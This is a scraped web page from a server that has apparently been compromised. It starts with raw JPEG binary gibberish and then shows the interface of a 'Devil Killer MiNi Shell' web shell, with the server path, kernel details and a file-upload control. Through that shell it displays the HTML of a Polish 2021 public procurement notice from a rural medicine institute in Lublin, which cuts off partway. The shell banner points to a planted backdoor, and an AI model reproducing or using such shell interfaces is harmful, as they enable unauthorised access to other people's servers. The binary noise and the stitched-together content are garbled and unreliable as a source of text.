JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210428/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210428/0004290202-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00042902 z dnia 2021-04-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Materiały dydaktyczne dotyczących szkoleń stacjonarnych i e learningowych, przeprowadzenie szkoleń, przeprowadzenie egzaminu oraz udzielanie konsultacji eksperckich dla uczestników projektu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">INSTYTUT MEDYCYNY WSI IM. WITOLDA CHODŹKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288521</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dra Kazimierza Jaczewskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-090</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 81 71 84 400</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">48 81 7478646</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@imw.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.imw.lublin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> badania naukowe i prace rozwojowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Materiały dydaktyczne dotyczących szkoleń stacjonarnych i e learningowych, przeprowadzenie szkoleń, przeprowadzenie egzaminu oraz udzielanie konsultacji eksperckich dla uczestników projektu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1aa2180b-a851-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00042902</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> ”Kompetencje w ochronie zdrowia”, realizowanego w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 Priorytet V Wsparcie dla obszaru zdrowia Działanie 5.2 Działania projakościowe i rozwiązania organizacyjne w systemie ochrony zdrowia ułatwiające dostęp do niedrogich, trwałych oraz wysokiej jakości usług zdrowotnych. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania/267b9e6e-28ec-414f-9570-66c7e1f50157 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu oudzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów luboświadczeń między Zamawiającym a Wykonawcami, odbywać się przy użyciu środków komunikacjielektronicznej przy użyciu miniPortalu https://miniportal.uzp.gov.pl/ oraz ePUAPuhttps://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje zawiera Rozdział 10 SWZ.1. W postępowaniu o udzielenie zamówieniakomunikacja między Zamawiającym, a Wykonawcami odbywa się za pośrednictwem miniPortaluhttps://miniportal.uzp.gov.pl ePUAPu https://epuap.gov.pl/wps/portal.2. Wnioski, zawiadomienia orazinformacje Zamawiający i Wykonawcy przekazują za pośrednictwem dedykowanego formularzadostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji).3.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musiposiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.4. Wymaganiatechniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopiidokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały wRegulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformyusług administracji publicznej (ePUAP).5. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę akceptuje zasady korzystania z systemu miniPortal . Wykonawcaprzystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunkikorzystania z miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając zminiPortalu przestrzegać postanowień tego regulaminu.6. Maksymalny rozmiar plików przesyłanych zapośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz dokomunikacji wynosi 150 MB.7. Za datę przekazania oferty, wraz z załącznikami oraz oświadczeniemskładanym wraz z ofertą, przyjmuje się datę ich przekazania na ePUAP. 8. Korespondencja (inna niżoferta Wykonawcy i załączniki do oferty) przekazywana za pośrednictwem dedykowanego formularzadostępnego na ePUAP udostępnionego przez miniPortal (Formularz do komunikacji) nie może byćszyfrowana9. Zamawiający przekazuje ID postępowania w niniejszej SWZ. Dane postępowanie możnawyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „DlaWykonawców” lub ze strony głównej z zakładki Postępowania.10. Sporządzanie i przekazywanieinformacji w tym dokumentów elektronicznych musi być zgodne z wymaganiami określonymi wrozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania iprzekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środkówkomunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zamawiający jako administrator danych osobowych, obowiązany jest do spełnienia obowiązku informacyjnego z art. 13 RODO względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Dotyczy to w szczególności:1)	wykonawcy będącego osobą fizyczną,2)	wykonawcy będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą,3)	pełnomocnika wykonawcy będącego osobą fizyczną (np. dane osobowe zamieszczone w pełnomocnictwie),4)	członka organu zarządzającego wykonawcy, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK),5)	osoby fizycznej skierowanej do przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego.2.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: 1)	administratorem Pani/Pana danych osobowych jest Instytut Medycyny Wsi im. Witolda Chodźki, ul. dr Kazimierza Jaczewskiego 2, 20-090 Lublin, NIP 7120103781, REGON 000288521;2)	inspektorem ochrony danych osobowych w Instytucie Medycyny Wsi im. W. Chodźki jest Pan Paweł Wierzba , adres e-mail: iod@imw.lublin.pl.3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu udzielenia przedmiotowego zamówienia w niniejszym postępowaniu.4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania;5)	Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania Umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania Umowy;6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;3.	Zamawiający informuje, że posiada Pani/Pan: 1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;2)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych. Skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień Umowy w zakresie niezgodnym z Ustawą oraz nie może naruszać integralności protokołu oraz jego załączników;3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego; 4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;4.	Zamawiający informuje, iż nie przysługuje Pani/Panu:1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z Rozdziałem 33 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP.226.6/ZP/U/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> opracowanie materiałów dydaktycznych dotyczących szkoleń stacjonarnych i e learningowych, przeprowadzeniu szkolenia, przeprowadzenie egzaminu zgodnie z OPZ -załącznik nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.Kryteria oceny ofert:1)	Kryterium cena (brutto) - 60 punktówWartość punktowa w kryterium cena = cena najniższa / cena oferty badanej x 60.2)	Kryterium wykazanie doświadczenia osoby skierowanej do realizacji zamówienia w ilości przeprowadzonych godzin szkoleniowych/wykładowych – 30 punktówW ramach kryterium wykazanie przez Wykonawcę doświadczenia osoby przeprowadzającej szkolenie tj. Wykładowcy w ilości przeprowadzonych godzin szkoleniowych/wykładowych. Zamawiający przyzna punkty za przeprowadzoną przez Wykładowcę liczbę godzin szkoleniowych/wykładowych z tematyki zgodnej z przedmiotem zamówienia.Punkty będą przyznawane według poniższych przedziałów:0 pkt - wykazanie doświadczenia za przeprowadzenie poniżej 50 godzin szkoleń/wykładów z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowania10 pkt. – wykazanie doświadczenia za przeprowadzenie od 50 do 100 godzin szkoleń/ wykładów z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowania20 pkt. - wykazanie doświadczenia za przeprowadzenie od 101 do 200 godzin szkoleń/ wykładów z tematyki zgodnej z przedmiotem zamówienia. w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowania30 pkt. - wykazanie doświadczenia za przeprowadzenie od 201 i więcej godzin szkoleń/ wykładów z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowaniaPunkty za kryterium „wykazanie doświadczenia osoby skierowanej do realizacji zamówienia zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego3)	Kryterium – Aspekt społeczny- 10 pkt.Delegowanie do wykonania usługi osób znajdujących się w szczególnej sytuacji na rynku pracy(od 0-10pkt).Punkty za kryterium „Aspekt społeczny” zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego, które zawiera informacje czy i w jaki sposób przy realizacji zamówienia będą stosowane klauzule społeczne,(tj. m.in. osoby z niepełnosprawnościami, osoby w wieku 50 lat i więcej, osoby o niskich kwalifikacjach, tj. z wykształceniem ponadgimnazjalnym i niższym, osoby długotrwale bezrobotne, matki samotnie wychowujące dzieci, osoby sprawujące opiekę lub powracające na rynek pracy po okresie sprawowania opieki).Brak zaangażowanie na umowę o pracę osoby znajdującej się w szczególnej sytuacji na rynku pracy-0 pktZaangażowanie na umowę o pracę 1-ej osoby znajdującej się w szczególnej sytuacji na rynku pracy-3 pktZaangażowanie na umowę o pracę 2-óch osób znajdującej się w szczególnej sytuacji na rynku pracy-6 pktZaangażowanie na umowę o pracę 3-ech i więcej osób znajdującej się w szczególnej sytuacji na rynku pracy- 10 punktówPunkty za poszczególne kryteria zostaną zsumowane wg wzoru:C + D + Kgdzie: C – punkty przyznane w kryterium „Cena”, D – punkty przyznane w kryterium „Doświadczenia w ilości przeprowadzonych godzin szkoleniowych/wykładowych”,K - punkty przyznane w kryterium „Aspekt społeczny”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wykazanie doświadczenia osoby skierowanej do realizacji zamówienia w ilości przeprowadzonych godzin szkoleniowych/wykładowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">aspekt społeczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.Kryteria oceny ofert:1)	Kryterium cena (brutto) - 60 punktówWartość punktowa w kryterium cena = cena najniższa / cena oferty badanej x 60.2)	Kryterium wykazanie doświadczenia osoby skierowanej do realizacji zamówienia w ilości przeprowadzonych godzin szkoleniowych/wykładowych – 30 punktówW ramach kryterium wykazanie przez Wykonawcę doświadczenia osoby przeprowadzającej szkolenie tj. Wykładowcy w ilości przeprowadzonych godzin szkoleniowych/wykładowych. Zamawiający przyzna punkty za przeprowadzoną przez Wykładowcę liczbę godzin szkoleniowych/wykładowych z tematyki zgodnej z przedmiotem zamówienia.Punkty będą przyznawane według poniższych przedziałów:0 pkt - wykazanie doświadczenia za przeprowadzenie poniżej 50 godzin szkoleń/wykładów z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowania10 pkt. – wykazanie doświadczenia za przeprowadzenie od 50 do 100 godzin szkoleń/ wykładów z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowania20 pkt. - wykazanie doświadczenia za przeprowadzenie od 101 do 200 godzin szkoleń/ wykładów z tematyki zgodnej z przedmiotem zamówienia. w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowania30 pkt. - wykazanie doświadczenia za przeprowadzenie od 201 i więcej godzin szkoleń/ wykładów z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowaniaPunkty za kryterium „wykazanie doświadczenia osoby skierowanej do realizacji zamówienia zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego3)	Kryterium – Aspekt społeczny- 10 pkt.Delegowanie do wykonania usługi osób znajdujących się w szczególnej sytuacji na rynku pracy(od 0-10pkt).Punkty za kryterium „Aspekt społeczny” zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego, które zawiera informacje czy i w jaki sposób przy realizacji zamówienia będą stosowane klauzule społeczne,(tj. m.in. osoby z niepełnosprawnościami, osoby w wieku 50 lat i więcej, osoby o niskich kwalifikacjach, tj. z wykształceniem ponadgimnazjalnym i niższym, osoby długotrwale bezrobotne, matki samotnie wychowujące dzieci, osoby sprawujące opiekę lub powracające na rynek pracy po okresie sprawowania opieki).Brak zaangażowanie na umowę o pracę osoby znajdującej się w szczególnej sytuacji na rynku pracy-0 pktZaangażowanie na umowę o pracę 1-ej osoby znajdującej się w szczególnej sytuacji na rynku pracy-3 pktZaangażowanie na umowę o pracę 2-óch osób znajdującej się w szczególnej sytuacji na rynku pracy-6 pktZaangażowanie na umowę o pracę 3-ech i więcej osób znajdującej się w szczególnej sytuacji na rynku pracy- 10 punktówPunkty za poszczególne kryteria zostaną zsumowane wg wzoru:C + D + Kgdzie: C – punkty przyznane w kryterium „Cena”, D – punkty przyznane w kryterium „Doświadczenia w ilości przeprowadzonych godzin szkoleniowych/wykładowych”,K - punkty przyznane w kryterium „Aspekt społeczny”. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> opracowanie materiałów dydaktycznych dotyczących szkoleń stacjonarnych i e learningowych, przeprowadzeniu szkolenia, przeprowadzenie egzaminu zgodnie z OPZ -załącznik nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi 